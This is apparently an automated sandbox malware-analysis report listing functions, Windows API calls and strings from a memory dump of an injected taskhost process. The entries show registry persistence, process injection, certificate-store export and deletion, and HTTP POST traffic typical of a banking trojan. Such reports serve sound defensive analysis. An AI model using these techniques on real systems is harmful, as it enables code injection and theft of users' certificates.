Strings

D, xrefs: 01197FA7

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119E89E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0119E8E0

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 011A76B3
Part of subcall function 011A768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 011A76E2
Part of subcall function 011A768E: RegCloseKey.KERNEL32(?), ref: 011A7702

Strings

Qanyodfyy, xrefs: 0119E8B7, 0119E8F2
SOFTWARE\Microsoft\Xyuxy, xrefs: 0119E8A7, 0119E8B2, 0119E8BE, 0119E8D9

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A9A9E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?), ref: 011A9ADD

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 011A76B3
Part of subcall function 011A768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 011A76E2
Part of subcall function 011A768E: RegCloseKey.KERNEL32(?), ref: 011A7702

Strings

Igvyfua, xrefs: 011A9AB6, 011A9AEF
SOFTWARE\Microsoft\Xyuxy, xrefs: 011A9AA7, 011A9AB1, 011A9ABD, 011A9AD8

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01196BD7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?), ref: 01196C00

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 011A76B3
Part of subcall function 011A768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 011A76E2
Part of subcall function 011A768E: RegCloseKey.KERNEL32(?), ref: 011A7702

Strings

Buholiyn, xrefs: 01196C12
SOFTWARE\Microsoft\Xyuxy, xrefs: 01196BF7

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A52D1, Relevance: 4.6, APIs: 3, Instructions: 100

APIs

Part of subcall function 011A7E19: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 011A7E48

WaitForSingleObject.KERNEL32(?,?), ref: 011A5325
Sleep.KERNEL32(?,?,?,00000000), ref: 011A5338

Part of subcall function 011A4F8F: InternetOpenA.WININET(01F1FED0,00000001,00000000,00000000,00000000), ref: 011A4FA6
Part of subcall function 011A4F8F: InternetSetOptionA.WININET(00000000,00000002,011B200C,00000004), ref: 011A4FC5
Part of subcall function 011A4F8F: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 011A4FE2
Part of subcall function 011A4F8F: InternetCloseHandle.WININET(00000000), ref: 011A4FEE

Part of subcall function 011A50A3: HttpOpenRequestA.WININET(00000003,POST,00000000,HTTP/1.1,00000000,011B2000,8404F700,00000000), ref: 011A50EB
Part of subcall function 011A50A3: HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 011A5112
Part of subcall function 011A50A3: HttpQueryInfoA.WININET(00000000,20000013,00000000,00000000,00000000), ref: 011A5137
Part of subcall function 011A50A3: InternetCloseHandle.WININET(00000000), ref: 011A514F

InternetCloseHandle.WININET(00000000), ref: 011A53BE

Part of subcall function 011A51FD: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 011A521D
Part of subcall function 011A51FD: WaitForSingleObject.KERNEL32(?,00000000), ref: 011A524B
Part of subcall function 011A51FD: InternetReadFile.WININET(00001000,?,00001000,?), ref: 011A5267
Part of subcall function 011A51FD: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011A5282
Part of subcall function 011A51FD: FlushFileBuffers.KERNEL32(00000000), ref: 011A52A2
Part of subcall function 011A51FD: CloseHandle.KERNEL32(00000000), ref: 011A52B5

Part of subcall function 011A515D: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 011A5186
Part of subcall function 011A515D: InternetReadFile.WININET(00000003,00001000,00001000,00001000), ref: 011A51BD

Part of subcall function 011A4FFB: InternetQueryOptionA.WININET(?,00000015,00000000,?), ref: 011A501A
Part of subcall function 011A4FFB: InternetCloseHandle.WININET(00000004), ref: 011A502B
Part of subcall function 011A4FFB: InternetCloseHandle.WININET(00000000), ref: 011A5040

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01194BCE, Relevance: 4.6, APIs: 3, Instructions: 58

APIs

Part of subcall function 011A64FD: socket.WS2_32(00000000,00000001,00000006), ref: 011A6506
Part of subcall function 011A64FD: bind.WS2_32(00000000,?,-0000001D), ref: 011A6526
Part of subcall function 011A64FD: listen.WS2_32(00000000,?), ref: 011A6535
Part of subcall function 011A64FD: #3.WS2_32(00000000), ref: 011A6540

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,7FFFFFFF,?,00000000,00000080,?,00000002), ref: 01194C2C
WSAEventSelect.WS2_32(?,00000000,00000008), ref: 01194C3E
CloseHandle.KERNEL32(?), ref: 01194C4F

Part of subcall function 011A675E: shutdown.WS2_32(?,00000002), ref: 011A6766
Part of subcall function 011A675E: #3.WS2_32(?), ref: 011A676D

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A1D15, Relevance: 4.5, APIs: 3, Instructions: 46

APIs

DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 011A1D3B
WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,00000000,?,00000000,?,011A25E9,00000000,?,?,?,?,011A316D,?), ref: 011A1D4F
DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 011A1D69

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A6AAA, Relevance: 4.5, APIs: 3, Instructions: 41

APIs

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,011A49F4,?,?,?,011A2326,000000FF,011B2C08), ref: 011A6AC3
GetLastError.KERNEL32(?,?,011A49F4,?,?,?,011A2326,000000FF,011B2C08,?,?,00000000), ref: 011A6AC9

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,011A49F4,?,?,?,011A2326,000000FF,011B2C08), ref: 011A6AEF

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A49D2, Relevance: 4.5, APIs: 3, Instructions: 37

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,011A2326,000000FF,011B2C08,?,?,00000000), ref: 011A49E2

Part of subcall function 011A6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,011A49F4,?,?,?,011A2326,000000FF,011B2C08), ref: 011A6AC3
Part of subcall function 011A6AAA: GetLastError.KERNEL32(?,?,011A49F4,?,?,?,011A2326,000000FF,011B2C08,?,?,00000000), ref: 011A6AC9
Part of subcall function 011A6AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,011A49F4,?,?,?,011A2326,000000FF,011B2C08), ref: 011A6AEF

GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,011A2326,000000FF,011B2C08), ref: 011A4A0E

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

CloseHandle.KERNEL32(?), ref: 011A4A23

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A763A, Relevance: 4.5, APIs: 3, Instructions: 36

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,011A9EAB,?,?,00000004), ref: 011A7658
RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,011A9EAB,?,?,011A9EAB,?,?,00000004,?,00000004), ref: 011A7672
RegCloseKey.KERNEL32(00000004,?,?,011A9EAB,?,?,00000004,?,00000004), ref: 011A7681

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A245B, Relevance: 4.5, APIs: 3, Instructions: 35

APIs

Part of subcall function 011A7A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 011A7AB5

CreateMutexW.KERNELBASE(011B2C30,00000001,?,011B2E70,76C605D7,?,00000002,?,76C605D7), ref: 011A24A3
GetLastError.KERNEL32 ref: 011A24AF
CloseHandle.KERNEL32(00000000), ref: 011A24BD

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A2BA3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83

APIs

Part of subcall function 011A20C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 011A2105
Part of subcall function 011A20C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 011A2172
Part of subcall function 011A20C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 011A21A7
Part of subcall function 011A20C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 011A21DB
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 011A21FA
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 011A220C
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 011A221E
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 011A2230
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 011A2242
Part of subcall function 011A20C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 011A2254
Part of subcall function 011A20C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 011A228D
Part of subcall function 011A20C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 011A229C
Part of subcall function 011A20C4: InitializeCriticalSection.KERNEL32(011B400C,?,?,00000000), ref: 011A22C9
Part of subcall function 011A20C4: WSAStartup.WS2_32(00000202,?), ref: 011A22DF
Part of subcall function 011A20C4: CreateEventW.KERNEL32(011B2C30,00000001,00000000,00000000,?,?,00000000), ref: 011A2300
Part of subcall function 011A20C4: GetLengthSid.ADVAPI32(00000000,000000FF,011B2C08,?,?,00000000), ref: 011A2335
Part of subcall function 011A20C4: GetCurrentProcessId.KERNEL32(00000000,01F1F7D0,00000000,?,?,00000000), ref: 011A2362

Part of subcall function 011A2A32: CloseHandle.KERNEL32(011B2AF0), ref: 011A2AF2

Part of subcall function 0119E959: CreateMutexW.KERNELBASE(011B2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01194E69,?,?,?,743C152E,00000002), ref: 0119E97F

CoInitializeEx.OLE32(00000000,00000002), ref: 011A2C62

Part of subcall function 011A9837: CoUninitialize.OLE32 ref: 011A9845

Part of subcall function 011AD486: CertOpenSystemStoreW.CRYPT32(00000000,01194BBC,?,00000000,00000001), ref: 011AD4A1
Part of subcall function 011AD486: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 011AD4BD
Part of subcall function 011AD486: CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 011AD4C9
Part of subcall function 011AD486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 011AD508
Part of subcall function 011AD486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 011AD538
Part of subcall function 011AD486: CharLowerW.USER32 ref: 011AD556
Part of subcall function 011AD486: GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 011AD561
Part of subcall function 011AD486: CertCloseStore.CRYPT32(?,00000000), ref: 011AD5EA

Part of subcall function 011AD5FB: CertOpenSystemStoreW.CRYPT32(00000000,01194BBC,?,00000001,011A2C2A), ref: 011AD606
Part of subcall function 011AD5FB: CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,011A2C2A), ref: 011AD61F
Part of subcall function 011AD5FB: CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,011A2C2A), ref: 011AD62A
Part of subcall function 011AD5FB: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,011A2C2A), ref: 011AD632
Part of subcall function 011AD5FB: CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,011A2C2A), ref: 011AD63E

Part of subcall function 011AA138: SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 011AA170

Strings

@, xrefs: 011A2C99

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119E959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30

APIs

CreateMutexW.KERNELBASE(011B2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01194E69,?,?,?,743C152E,00000002), ref: 0119E97F

Part of subcall function 0119E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0119E8E0

Part of subcall function 011A6B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 011A6B0A
Part of subcall function 011A6B07: CloseHandle.KERNEL32(00000000), ref: 011A6B1C

Strings

Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 0119E95A, 0119E963, 0119E96C, 0119E977

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A9D6D, Relevance: 3.2, APIs: 2, Instructions: 172

APIs

InitializeCriticalSection.KERNEL32(011B3F24,00000000,7718F8FF), ref: 011A9D8F

Part of subcall function 011A7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,011A9E26,?,?), ref: 011A75AD

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 011A9E63

Part of subcall function 011A763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,011A9EAB,?,?,00000004), ref: 011A7658
Part of subcall function 011A763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,011A9EAB,?,?,011A9EAB,?,?,00000004,?,00000004), ref: 011A7672
Part of subcall function 011A763A: RegCloseKey.KERNEL32(00000004,?,?,011A9EAB,?,?,00000004,?,00000004), ref: 011A7681

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Part of subcall function 011A7711: RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,80000001,011A9E78,?), ref: 011A771E
Part of subcall function 011A7711: RegCloseKey.ADVAPI32(?), ref: 011A772E

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A74DF, Relevance: 3.1, APIs: 2, Instructions: 77

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01197194,?,?,00000104,.exe,00000000), ref: 011A74F4
ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01197194,?,?,00000104), ref: 011A7575

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A7607: RegQueryValueExW.KERNEL32(?,?,00000000,?,011A9E26,?,?,?,011A75CD,?,?,00000000,00000004,?), ref: 011A761F
Part of subcall function 011A7607: RegCloseKey.KERNEL32(?,?,011A75CD,?,?,00000000,00000004,?,?,?,?,011A9E26,?,?), ref: 011A762D

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A1EE1, Relevance: 3.1, APIs: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 011A1F2C

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

lstrcmpiW.KERNEL32(?,?,?), ref: 011A1F56

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01194C68, Relevance: 3.0, APIs: 2, Instructions: 50

APIs

Part of subcall function 01194BCE: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,7FFFFFFF,?,00000000,00000080,?,00000002), ref: 01194C2C
Part of subcall function 01194BCE: WSAEventSelect.WS2_32(?,00000000,00000008), ref: 01194C3E
Part of subcall function 01194BCE: CloseHandle.KERNEL32(?), ref: 01194C4F

getsockname.WS2_32(?,?,?), ref: 01194CBE

Part of subcall function 011A675E: shutdown.WS2_32(?,00000002), ref: 011A6766
Part of subcall function 011A675E: #3.WS2_32(?), ref: 011A676D

CloseHandle.KERNEL32(?), ref: 01194CE2

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A7477, Relevance: 3.0, APIs: 2, Instructions: 22

APIs

SetLastError.KERNEL32(0000009B,011A2AC8,00000000,0119BB5F,00000000,011B2AF0,00000000,00000104,76C605D7,00000000), ref: 011A7481
CreateThread.KERNEL32(00000000,011B2AF0,011B2AF0,011B2AF0,00000000,00000000), ref: 011A74A4

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A7607, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,011A9E26,?,?,?,011A75CD,?,?,00000000,00000004,?), ref: 011A761F
RegCloseKey.KERNEL32(?,?,011A75CD,?,?,00000000,00000004,?,?,?,?,011A9E26,?,?), ref: 011A762D

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A8716, Relevance: 3.0, APIs: 2, Instructions: 8

APIs

SetFileAttributesW.KERNELBASE(00000080,00000080,011AB4CD,?), ref: 011A871F
DeleteFileW.KERNELBASE(?), ref: 011A8729

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A8678, Relevance: 2.5, APIs: 2, Instructions: 16

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,011AC83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 011A8689
CloseHandle.KERNEL32(?), ref: 011A8697

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01198AF8, Relevance: 1.7, APIs: 1, Instructions: 179

APIs

CoCreateInstance.OLE32(011915E0,00000000,00004401,011915C0,?), ref: 01198B1D

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01196DE7, Relevance: 1.6, APIs: 1, Instructions: 99

APIs

Part of subcall function 011A52D1: WaitForSingleObject.KERNEL32(?,?), ref: 011A5325
Part of subcall function 011A52D1: Sleep.KERNEL32(?,?,?,00000000), ref: 011A5338
Part of subcall function 011A52D1: InternetCloseHandle.WININET(00000000), ref: 011A53BE

Part of subcall function 01196BD7: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?), ref: 01196C00

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

WaitForSingleObject.KERNEL32(00002710,00000000), ref: 01196EC8

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A7E19, Relevance: 1.6, APIs: 1, Instructions: 94

APIs

InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 011A7E48

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011987A3, Relevance: 1.6, APIs: 1, Instructions: 94

APIs

Part of subcall function 011A74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01197194,?,?,00000104,.exe,00000000), ref: 011A74F4
Part of subcall function 011A74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01197194,?,?,00000104), ref: 011A7575

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000104), ref: 01198827

Part of subcall function 011A8AE4: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 011A8B23
Part of subcall function 011A8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 011A8B4A
Part of subcall function 011A8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 011A8B94
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 011A8BC1
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?), ref: 011A8BF1
Part of subcall function 011A8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 011A8C1F
Part of subcall function 011A8AE4: FindClose.KERNELBASE(?,?,?,?,00000000), ref: 011A8C31

Part of subcall function 011A768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 011A76B3
Part of subcall function 011A768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 011A76E2
Part of subcall function 011A768E: RegCloseKey.KERNEL32(?), ref: 011A7702

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AA138, Relevance: 1.6, APIs: 1, Instructions: 72

APIs

SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 011AA170

Part of subcall function 011A8AE4: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 011A8B23
Part of subcall function 011A8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 011A8B4A
Part of subcall function 011A8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 011A8B94
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 011A8BC1
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?), ref: 011A8BF1
Part of subcall function 011A8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 011A8C1F
Part of subcall function 011A8AE4: FindClose.KERNELBASE(?,?,?,?,00000000), ref: 011A8C31

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119BE3B, Relevance: 1.6, APIs: 1, Instructions: 62

APIs

VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,0119C160,011B2360), ref: 0119BE72

Part of subcall function 0119BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,00000040,0119C160,00000000,00000000,00000004,?,?,0119C160,011B2360), ref: 0119BD86
Part of subcall function 0119BD44: WriteProcessMemory.KERNEL32(000000FF,DB84D88A,?,35FFC690,00000000,?,?,0119C160,011B2360), ref: 0119BD9C
Part of subcall function 0119BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,0119C160,0119C160,?,?,0119C160,011B2360), ref: 0119BDB6

Part of subcall function 011A7BF7: VirtualProtectEx.KERNELBASE(000000FF,0119C160,0000001E,00000040,011B2360,0119C158,00000004,?,?,?,?,0119BE97,6A011B23,00000000), ref: 011A7C24
Part of subcall function 011A7BF7: ReadProcessMemory.KERNELBASE(000000FF,0119C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,0119BE97,6A011B23,00000000), ref: 011A7C4B
Part of subcall function 011A7BF7: WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 011A7CC5
Part of subcall function 011A7BF7: WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 011A7CED
Part of subcall function 011A7BF7: VirtualProtectEx.KERNELBASE(000000FF,0119C160,0000001E,011B2360,011B2360,?,?,?,?,0119BE97,6A011B23,00000000,?,?,0119C160,011B2360), ref: 011A7D05

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01196F38, Relevance: 1.5, APIs: 1, Instructions: 49

APIs

Part of subcall function 011A2507: CreateMutexW.KERNELBASE(011B2C30,00000000,?,?,?,?,?), ref: 011A2528

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

WaitForSingleObject.KERNEL32(?,00000000), ref: 01196FB2

Part of subcall function 011A6B8E: ReleaseMutex.KERNEL32(00000000,011A3021,?,?,?), ref: 011A6B92

Part of subcall function 01196DE7: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 01196EC8

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

